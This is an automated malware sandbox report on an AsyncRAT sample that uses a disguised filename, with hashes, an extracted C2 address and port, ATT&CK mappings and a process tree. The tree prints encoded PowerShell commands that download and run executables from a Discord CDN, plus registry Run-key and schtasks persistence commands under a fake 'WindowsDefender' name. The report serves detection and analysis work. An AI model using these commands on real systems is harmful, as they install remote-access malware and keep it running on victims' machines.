asyncrat | 3b2776d93feca48f02f530dff6a3d4d918d94ce4e61c249b9f51f24d1d090d74

Analysis

max time kernel
6s
max time network
32s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
21/11/2023, 18:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Venom Control Client‮nls..scr
Size

571KB
MD5

f1bc7841474849a77e8e0b2e507f2ac7
SHA1

eea072584a9227f763d15d784eb52c64453c9505
SHA256

3b2776d93feca48f02f530dff6a3d4d918d94ce4e61c249b9f51f24d1d090d74
SHA512

e9d342ea6620fc1b69868d5b503363a685a50e7184ba28c310f9648b85ebbb3684eb5be08ff5dd678e1026499fe2c562eb45b0c28228e96b7746553f6a1d12b7
SSDEEP

12288:C7oVrmFrSStI0kPUjGn61DfVwZ3pSOPXb2c1wxC3Si+hjTO6HH:3i/i4Jt9wZ3/bTwxQgVTOOH

Score

10^/10

asyncrat microsoftedg microsoftedge rat upx

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

MicrosoftEdg

46.1.103.69:9371

Mutex

MicrosoftEdg

Attributes

delay
3
install
false
install_file
MicrosoftEdge
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

MicrosoftEdge

46.1.103.69:9371

Mutex

MicrosoftEdge

Attributes

delay
3
install
false
install_file
MicrosoftEdge
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral3/memory/212-168-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral3/memory/1880-250-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Downloads MZ/PE file

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation	WFp8NVOepv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation	rRMmVc5mvJ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation	ZyIPmUtGAa.exe

Executes dropped EXE 3 IoCs

pid	Process
1244	WFp8NVOepv.exe
2592	rRMmVc5mvJ.exe
1256	ZyIPmUtGAa.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/memory/4844-0-0x00007FF7943B0000-0x00007FF794514000-memory.dmp	upx
behavioral3/memory/4844-68-0x00007FF7943B0000-0x00007FF794514000-memory.dmp	upx
behavioral3/memory/4844-79-0x00007FF7943B0000-0x00007FF794514000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4676	schtasks.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000_Classes\Local Settings	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2652	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2652	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2080	OpenWith.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 4844 wrote to memory of 1144	4844	Venom Control Client‮nls..scr	85
PID 4844 wrote to memory of 1144	4844	Venom Control Client‮nls..scr	85
PID 4844 wrote to memory of 3732	4844	Venom Control Client‮nls..scr	89
PID 4844 wrote to memory of 3732	4844	Venom Control Client‮nls..scr	89
PID 3732 wrote to memory of 1244	3732	cmd.exe	91
PID 3732 wrote to memory of 1244	3732	cmd.exe	91
PID 4844 wrote to memory of 3856	4844	Venom Control Client‮nls..scr	92
PID 4844 wrote to memory of 3856	4844	Venom Control Client‮nls..scr	92
PID 3856 wrote to memory of 2592	3856	cmd.exe	94
PID 3856 wrote to memory of 2592	3856	cmd.exe	94
PID 4844 wrote to memory of 3892	4844	Venom Control Client‮nls..scr	95
PID 4844 wrote to memory of 3892	4844	Venom Control Client‮nls..scr	95
PID 1244 wrote to memory of 2652	1244	WFp8NVOepv.exe	96
PID 1244 wrote to memory of 2652	1244	WFp8NVOepv.exe	96
PID 3892 wrote to memory of 1256	3892	cmd.exe	99
PID 3892 wrote to memory of 1256	3892	cmd.exe	99
PID 2592 wrote to memory of 4092	2592	rRMmVc5mvJ.exe	100
PID 2592 wrote to memory of 4092	2592	rRMmVc5mvJ.exe	100
PID 4844 wrote to memory of 1444	4844	Venom Control Client‮nls..scr	102
PID 4844 wrote to memory of 1444	4844	Venom Control Client‮nls..scr	102
PID 1256 wrote to memory of 3756	1256	ZyIPmUtGAa.exe	105
PID 1256 wrote to memory of 3756	1256	ZyIPmUtGAa.exe	105

C:\Users\Admin\AppData\Local\Temp\Venom Control Client‮nls..scr
"C:\Users\Admin\AppData\Local\Temp\Venom Control Client‮nls..scr" /S
1⤵
- Suspicious use of WriteProcessMemory
PID:4844
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\AppData\Local\Temp\BVz5wvH95r.sln
  2⤵
  - Modifies registry class
  PID:1144
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\AppData\Local\Temp\WFp8NVOepv.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3732
- - C:\Users\Admin\AppData\Local\Temp\WFp8NVOepv.exe
    C:\Users\Admin\AppData\Local\Temp\WFp8NVOepv.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYQBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADUANQA3ADYANwAyADAANgA5ADcANAA1ADkANQAwADkAMwAvADEAMQA3ADYANAA2ADkAOQAyADgAMQA1ADMANAA2ADkAMAAyADgALwBXAGkAbgBkAG8AdwBzAEQAZQBmAGUAbgBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHgAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAZwBxACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAZwBrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEASABGAEoAMwAyAC4AZQB4AGUAJwApACkAPAAjAG4AdQBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHcAegBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBtAGQAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxAEgARgBKADMAMgAuAGUAeABlACcAKQA8ACMAagB5AHcAIwA+AA=="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2652
    - - C:\Users\Admin\AppData\Roaming\1HFJ32.exe
        
        "C:\Users\Admin\AppData\Roaming\1HFJ32.exe"
        5⤵
        
        PID:4400
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsDefender';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsDefender' -Value '"C:\Users\Admin\AppData\Roaming\WindowsDefender\WindowsDefender.exe"' -PropertyType 'String'
        6⤵
        
        PID:4548
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C schtasks /create /tn \WindowsDefender /tr "C:\Users\Admin\AppData\Roaming\WindowsDefender\WindowsDefender.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        6⤵
        
        PID:3940
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn \WindowsDefender /tr "C:\Users\Admin\AppData\Roaming\WindowsDefender\WindowsDefender.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        7⤵
        Creates scheduled task(s)
        
        PID:4676
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        6⤵
        
        PID:588
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        6⤵
        
        PID:5048
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        6⤵
        
        PID:212
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\AppData\Local\Temp\rRMmVc5mvJ.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3856
- - C:\Users\Admin\AppData\Local\Temp\rRMmVc5mvJ.exe
    C:\Users\Admin\AppData\Local\Temp\rRMmVc5mvJ.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2592
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAZQBnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADYAOQA5ADIANQAxADYAMgA5ADEAMwA4ADIAMgAvAEQAcwBGAHIAQQBLAE4AWABtAFcALgBlAHgAZQAnACwAIAA8ACMAdQBwAHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAHkAYgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB1AHQAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAEgARwBGAEoAMwAyAC4AZQB4AGUAJwApACkAPAAjAGMAbAB6ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGwAYQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAGQAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAyAEgARwBGAEoAMwAyAC4AZQB4AGUAJwApADwAIwBqAHEAYQAjAD4A"
      4⤵
      PID:4092
    - - C:\Users\Admin\AppData\Roaming\2HGFJ32.exe
        
        "C:\Users\Admin\AppData\Roaming\2HGFJ32.exe"
        5⤵
        
        PID:5064
      - C:\Users\Admin\AppData\Roaming\2HGFJ32.exe
        
        "C:\Users\Admin\AppData\Roaming\2HGFJ32.exe"
        6⤵
        
        PID:1880
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\AppData\Local\Temp\ZyIPmUtGAa.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3892
- - C:\Users\Admin\AppData\Local\Temp\ZyIPmUtGAa.exe
    C:\Users\Admin\AppData\Local\Temp\ZyIPmUtGAa.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1256
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYwB3ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADYAOQA5ADAAMwAyADYAMAAyADcAMAA2ADAAMgAvAFcAaQBuAGwAbwBnAG8AbgAuAGUAeABlACcALAAgADwAIwBqAGUAawAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAawB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGoAYgB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADMASABHAEYASgAzADIALgBlAHgAZQAnACkAKQA8ACMAcQB1AG4AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbABiAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGwAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADMASABHAEYASgAzADIALgBlAHgAZQAnACkAPAAjAHgAegBlACMAPgA="
      4⤵
      PID:3756
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\AppData\Local\Temp\Z3ltSr3Cmn.exe
  2⤵
  PID:1444
- - C:\Users\Admin\AppData\Local\Temp\Z3ltSr3Cmn.exe
    C:\Users\Admin\AppData\Local\Temp\Z3ltSr3Cmn.exe
    3⤵
    PID:3152
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAegBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADYAOQA4ADkAMwAzADEAOQA3ADcANAAyADAAOAAvAGoAaABzAGQALgBlAHgAZQAnACwAIAA8ACMAcAB0AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBqAHoAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAGoAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA0AEgARwBHAEYASgAzADIALgBlAHgAZQAnACkAKQA8ACMAagBqAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYQBrAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHIAZgBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQASABHAEcARgBKADMAMgAuAGUAeABlACcAKQA8ACMAeAB3AGoAIwA+AA=="
      4⤵
      PID:1252
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\AppData\Local\Temp\uBcZuGC1SL.exe
  2⤵
  PID:3524
- - C:\Users\Admin\AppData\Local\Temp\uBcZuGC1SL.exe
    C:\Users\Admin\AppData\Local\Temp\uBcZuGC1SL.exe
    3⤵
    PID:3604
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAYwByACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADYAOQA4ADAAMQA0ADEANAAxADYAOAA2ADIANgAvAGUAbABlAGMAaQBpAHAAaQBjAGwALgBlAHgAZQAnACwAIAA8ACMAcQBwAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAGsAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGcAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA1AEgAQwBHAEcARgBKADMAMgAuAGUAeABlACcAKQApADwAIwBjAHcAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBmAGMAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcgB1AHEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANQBIAEMARwBHAEYASgAzADIALgBlAHgAZQAnACkAPAAjAHAAYgBqACMAPgA="
      4⤵
      PID:1872
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\AppData\Local\Temp\4jyHFbjaOf.exe
  2⤵
  PID:2520
- - C:\Users\Admin\AppData\Local\Temp\4jyHFbjaOf.exe
    C:\Users\Admin\AppData\Local\Temp\4jyHFbjaOf.exe
    3⤵
    PID:4084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAdwBmACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEANQA1ADcANgA3ADIAMAA2ADkANwA0ADUAOQA1ADAAOQAzAC8AMQAxADcANgA0ADcAMwA2ADcAOAA4ADAAOQAxADUANwA2ADUAMgAvAFIAdQBuAHQAaQBtAGUAQgByAG8AawBlAHIALgBlAHgAZQA/AGUAeAA9ADYANQA2AGUAZgBmADcAZQAmAGkAcwA9ADYANQA1AGMAOABhADcAZQAmAGgAbQA9ADQANgBkAGMANQBlAGMAMwA1ADkAZgA4AGEANgA2AGYAMAA4AGUAZQBmAGQANgA0ADIAZgA2AGYANAA0ADIANAA4ADQANAA0ADAAYgBiADIANAA0AGIAYwBhADcANAAwAGUAMAA0ADYAYwAzADMAMwBjADcAOQAyADEAYQA1ADgAJgAnACwAIAA8ACMAYwBqAHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAHYAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHUAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA2AEgAQwBHAEcARgBKADMAMgAuAGUAeABlACcAKQApADwAIwByAHAAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBzAGEAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBiAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcANgBIAEMARwBHAEYASgAzADIALgBlAHgAZQAnACkAPAAjAGIAdwB4ACMAPgA="
      4⤵
      PID:3404
- C:\Windows\system32\cmd.exe
  "cmd" /C C:\Users\Admin\AppData\Local\Temp\zujkpjwRLT.exe
  2⤵
  PID:1520
- - C:\Users\Admin\AppData\Local\Temp\zujkpjwRLT.exe
    C:\Users\Admin\AppData\Local\Temp\zujkpjwRLT.exe
    3⤵
    PID:3928

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\uBcZuGC1SL.exe.log

Filesize
226B

MD5
28d7fcc2b910da5e67ebb99451a5f598

SHA1
a5bf77a53eda1208f4f37d09d82da0b9915a6747

SHA256
2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

SHA512
2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2HGFJ32.exe.log

Filesize
617B

MD5
99e770c0d4043aa84ef3d3cbc7723c25

SHA1
19829c5c413fccba750a3357f938dfa94486acad

SHA256
33c7dd4c852dae6462c701337f8e0a8647602847ccaee656fa6f1149cccfb5d5

SHA512
ba521e2f57d7e1db19445201948caa7af6d953e1c1340228934888f8ec05b8984ad492122d0bf0550b5e679614d8a713ecf68f91916ffa6e5d8f75bf003aae39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9b373adb37c2a3525c495c0b8a8f5435

SHA1
ce1796cf1e02a5f202d990d530077a6aa670937a

SHA256
1fd0555042d69e1eab13f09412a5ab18e4380b469a1c6c309c0a2d210c55cb34

SHA512
6185881dc74c17bc9a04165731ced79cd3ca252b240326d722b253a39a8c470a7478398db60ed915cbaf3a4e711c23e290c013e86cff685fc1dff2539e4a6a3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ec484f5eba2f29de745101dfa991b523

SHA1
7c21ecc9206a1a9162f399a6034881f45947b340

SHA256
a64ce3f37231c19aed671a3f57c9be4faf8980fd9aff3c683fa3565abdcdedc2

SHA512
564252e7a8d5f95b8e047d9469b11ef45074a102a10fc20a22df1b7aabf089015854b632dbf6a62d3176b5543dc9cf11d66418b71220535207211569a38c9d32

Download Submit
C:\Users\Admin\AppData\Local\Temp\4jyHFbjaOf.exe

Filesize
6KB

MD5
887c8ab2ee3e223da282a35dec64a61f

SHA1
ec43ea5d449853c514c527ba55a26e677795b8a9

SHA256
1391f4b5a1319940dec3f724e9dd6ce01cb596cd691c71b271e448e496b6e3c6

SHA512
7f7d50e546a363af9a303d02e8e3b650af512194d78e4f4310caba0d502d7fdd426d516059c4df6f1deab1d4f6e97c3267a3a3af02893ed1739ded3bbf9f7a18

Download Submit
C:\Users\Admin\AppData\Local\Temp\4jyHFbjaOf.exe

Filesize
6KB

MD5
887c8ab2ee3e223da282a35dec64a61f

SHA1
ec43ea5d449853c514c527ba55a26e677795b8a9

SHA256
1391f4b5a1319940dec3f724e9dd6ce01cb596cd691c71b271e448e496b6e3c6

SHA512
7f7d50e546a363af9a303d02e8e3b650af512194d78e4f4310caba0d502d7fdd426d516059c4df6f1deab1d4f6e97c3267a3a3af02893ed1739ded3bbf9f7a18

Download Submit
C:\Users\Admin\AppData\Local\Temp\BVz5wvH95r.sln

Filesize
1KB

MD5
49e83452237bee03b19fcf08da6f1d9c

SHA1
6ab1082f3e64030b998cb1202b77e0817e051f9b

SHA256
97befc6c51ae1ea71ba40f0a0ae8bad63d45522d121cfa7bdac024d40351fdcf

SHA512
80d05f957efa5ff437f6cce58d77a2c59e8c0034eecaa05a3dcd0b8f1e95964c2c726886f800d002249650629bf48dc767652ee897b717c2edee2e55acb71bc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\WFp8NVOepv.exe

Filesize
6KB

MD5
a75b85a9502a6933aa0a9873ac3a6df0

SHA1
b477e4eb9df62f6e3e80a6e3e54b4d2812c842ed

SHA256
940d2c9ae3f5545cd6ec398089907f79c34e0c4341a23d2d2aaa7716378f3701

SHA512
cdb238f48c60f92dc7896c7f5d6d4ea52499e918740c782092b59fbb96e0a1369ceb63be82c28c45683efae0480a94ee6369bbd10408907b24d15232e053bce7

Download Submit
C:\Users\Admin\AppData\Local\Temp\WFp8NVOepv.exe

Filesize
6KB

MD5
a75b85a9502a6933aa0a9873ac3a6df0

SHA1
b477e4eb9df62f6e3e80a6e3e54b4d2812c842ed

SHA256
940d2c9ae3f5545cd6ec398089907f79c34e0c4341a23d2d2aaa7716378f3701

SHA512
cdb238f48c60f92dc7896c7f5d6d4ea52499e918740c782092b59fbb96e0a1369ceb63be82c28c45683efae0480a94ee6369bbd10408907b24d15232e053bce7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Z3ltSr3Cmn.exe

Filesize
5KB

MD5
0e2c37cc209fd52cce861928d859ab2d

SHA1
773ce4304e33a6cd74432572472244d8bf8e2d14

SHA256
081d8540af456e8725aa2de3bf1d18dcfad5aceb0a86c7fc5b8c847b1a78f051

SHA512
9ca95e3d40f6c95d0cf8c372aa68c49b276dd6731865c02e657e7e25e871e78b6f52e857b4f507acdc575942f9cb7c449586afab0dc3285ea6d727ae5c250b2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Z3ltSr3Cmn.exe

Filesize
5KB

MD5
0e2c37cc209fd52cce861928d859ab2d

SHA1
773ce4304e33a6cd74432572472244d8bf8e2d14

SHA256
081d8540af456e8725aa2de3bf1d18dcfad5aceb0a86c7fc5b8c847b1a78f051

SHA512
9ca95e3d40f6c95d0cf8c372aa68c49b276dd6731865c02e657e7e25e871e78b6f52e857b4f507acdc575942f9cb7c449586afab0dc3285ea6d727ae5c250b2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZyIPmUtGAa.exe

Filesize
5KB

MD5
3ed2b4079de8367146d73a4eabbb527b

SHA1
59ae6a2c2c6fa1aa8c7bffc04e6123c5b301c038

SHA256
cf7251cce700eca1370e65fb29f0e5e960a44ac77347ffcaa7daab45f693a8be

SHA512
